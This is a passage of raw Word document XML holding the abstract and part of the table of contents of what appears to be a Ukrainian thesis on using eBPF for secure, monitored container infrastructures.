      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00721BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00721BFD" w:rsidRPr="00721BFD" w:rsidRDefault="00D30D8A" w:rsidP="00721BFD">
      <w:pPr>
        <w:spacing w:after="0" w:line="36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Total volume of work: 68</w:t>
      </w:r>
      <w:r w:rsidR="00721BFD" w:rsidRPr="00721BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> pages. The number of illustrations is </w:t>
      </w:r>
      <w:r w:rsidR="00EE6AAF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r w:rsidR="00721BFD" w:rsidRPr="00721BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. The number o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f bibliographic references is 30</w:t>
      </w:r>
      <w:r w:rsidR="00721BFD" w:rsidRPr="00721BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> references.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00721BFD" w:rsidRPr="00721BFD" w:rsidRDefault="00721BFD" w:rsidP="00721BFD">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00721BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ARCHITECTURE, CYBERSECURITY, TOOLING, CONTAINER, ISOLATION, ENVIRONMENT, MONITORING, MANAGEMENT, FILTERING, PERFORMANCE, SECURITY POLICY, CLOUD ENVIRONMENT, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00721BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ebpf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00721BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, DevOps.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00721BFD" w:rsidRPr="00721BFD" w:rsidRDefault="00721BFD" w:rsidP="00721BFD">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00721BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The purpose of the work is to research and develop the process of integrating the extended Berkeley Packet Filter technology for building invisible containers in modern IT systems, which will increase the efficiency, security and scalability of container infrastructures.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00721BFD" w:rsidRPr="00721BFD" w:rsidRDefault="00721BFD" w:rsidP="00721BFD">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00721BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">In particular, the goal is to develop tools to optimize the interaction of containers through the use of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00721BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00721BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, as well as to explore the potential of this technology to create new approaches to management and privacy in multi-container environments.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00721BFD" w:rsidRDefault="00721BFD" w:rsidP="00721BFD">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00721BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">In general, the qualification work is aimed at analyzing the potential of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00721BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00721BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to solve the tasks of monitoring, optimization and ensuring security in the conditions of complex and highly loaded systems. This study is aimed at developing conceptual approaches to the use of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00721BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00721BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to increase the efficiency and flexibility of IT systems, as well as to improve the management of resources and network interactions in conditions of high scalability.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00721BFD" w:rsidRDefault="00721BFD" w:rsidP="00095429">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00721BFD" w:rsidRPr="00095429" w:rsidRDefault="00721BFD" w:rsidP="00095429">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A11308" w:rsidRPr="003F4E1A" w:rsidRDefault="00A11308" w:rsidP="00095429">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F4E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A11308" w:rsidRPr="003F4E1A" w:rsidRDefault="00A11308" w:rsidP="00A11308">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F4E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ЗМІСТ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A11308" w:rsidRPr="003F4E1A" w:rsidRDefault="00A11308" w:rsidP="003E765A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9355"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F4E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ПЕРЕЛІК УМОВНИХ</w:t>
      </w:r>
      <w:r w:rsidRPr="003F4E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> ПОЗНАЧЕНЬ, СКОРОЧЕНЬ І ТЕРМІНІВ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003F4E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>…</w:t>
      </w:r>
      <w:r w:rsidR="003E765A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003F4E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A11308" w:rsidRDefault="00A11308" w:rsidP="003E765A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9355"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F4E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ВСТУП</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003E765A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003F4E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A11308" w:rsidRPr="00910023" w:rsidRDefault="00A11308" w:rsidP="003E765A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9355"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0028380F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>РОЗДІЛ 1 </w:t>
      </w:r>
      <w:r w:rsidR="00EF6846" w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:caps/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Основи технології eBPF</w:t>
      </w:r>
      <w:r w:rsidR="00D75D2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003E765A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00D75D2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00D30D8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A11308" w:rsidRPr="00747A1C" w:rsidRDefault="00A11308" w:rsidP="003E765A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9355"/>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1.1. </w:t>
      </w:r>
      <w:r w:rsidR="00EF6846" w:rsidRPr="00EF6846">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Принципи роботи </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EF6846" w:rsidRPr="00EF6846">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00376B02">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003E765A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="003E765A" w:rsidRPr="003E765A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00D30D8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A11308" w:rsidRPr="00910023" w:rsidRDefault="00A11308" w:rsidP="003E765A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="935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1.2. </w:t>
      </w:r>
      <w:r w:rsidR="00EF6846" w:rsidRPr="00EF6846">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Роль </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EF6846" w:rsidRPr="00EF6846">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EF6846" w:rsidRPr="00EF6846">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> у системах </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EF6846" w:rsidRPr="00EF6846">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>безпеки</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EF6846" w:rsidRPr="00EF6846">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> та </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EF6846" w:rsidRPr="00EF6846">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>моніторингу</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003E765A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="003E765A" w:rsidRPr="003E765A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D30D8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A11308" w:rsidRPr="00B65E38" w:rsidRDefault="00A11308" w:rsidP="003E765A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="935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1.3. </w:t>
      </w:r>
      <w:r w:rsidR="00953087" w:rsidRPr="00953087">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Контейнери та їх безпека</w:t>
      </w:r>
      <w:r w:rsidR="008A258A" w:rsidRPr="00362E9B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>: концепція та реалізація</w:t>
      </w:r>
      <w:r w:rsidR="003E765A">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00D30D8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A11308" w:rsidRPr="00747A1C" w:rsidRDefault="00A11308" w:rsidP="003E765A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9355"/>
        </w:tabs>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РОЗДІЛ 2</w:t>
      </w:r>
      <w:r w:rsidRPr="0028380F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00F23047" w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:caps/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Сумісність </w:t>
      </w:r>
      <w:r w:rsidR="00362E9B" w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:caps/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">та використання </w:t>
      </w:r>
      <w:r w:rsidR="00F23047" w:rsidRPr="003C7FE5">
        <w:rPr>
